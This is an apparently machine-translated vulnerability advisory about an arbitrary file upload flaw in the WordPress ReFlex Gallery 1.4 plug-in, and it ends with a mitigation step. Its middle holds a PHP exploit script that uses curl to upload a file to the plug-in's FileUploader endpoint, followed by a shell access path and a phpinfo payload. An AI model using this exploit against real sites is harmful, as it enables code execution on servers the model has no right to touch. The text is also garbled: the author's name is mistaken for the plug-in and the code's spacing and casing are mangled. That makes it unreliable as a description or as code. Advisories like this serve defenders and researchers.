WordPress ReFlex Gallery plug-in 'php. php' Arbitrary File Upload Vulnerability and temporary solutions

Affected System: WordPress ReFlex Gallery 1.4 Description: Sammy FORGIT is an integrated library album plug-in. WordPress Sammy Forgit has a security vulnerability. wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php. php allows you to upload files with any extension to a folder in webroot. By submitting malicious PHP scripts, any PHP code can be executed. <* Source: Sammy Forgit link: http://packetstormsecurity.com/files/119218/wpreflexgallery-shell.txt http://www.securelist.com/en/advisories/51698 *> Test method: The following procedures (methods) may be offensive and are only used for security research and teaching. Users are at your own risk! Exploit: PostShell. php <? Php $ uploadfile = "lo. php"; $ ch = curl_init (" http://localhost/wordpress/wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php "); Curl_setopt ($ ch, CURLOPT_POST, true); curl_setopt ($ ch, CURLOPT_POSTFIELDS, array ('qqfile' =>" @ $ uploadfile "); curl_setopt ($ ch, CURLOPT_RETURNTRANSFER, 1); $ postResult = curl_exec ($ ch); curl_close ($ ch); print "$ postResult";?> Shell Access: http://localhost/wordpress/wp-content/uploads/Filename PostShell. php output lo. php <? Phpphpinfo ();?> # Site: 1337day.com Inj3ct0r Exploit DatabaseTemporary solution:If you cannot install or upgrade the patch immediately, NSFOCUS recommends that you take the following measures to reduce the threat: * disable the WordPress ReFlex Gallery plug-in vendor patch: WordPress --------- currently, the vendor has not provided or upgraded the patch, we recommend that users who use this software stay tuned to the vendor's homepage for the latest version: http://wordpress.org/extend/plugins/reflex-gallery/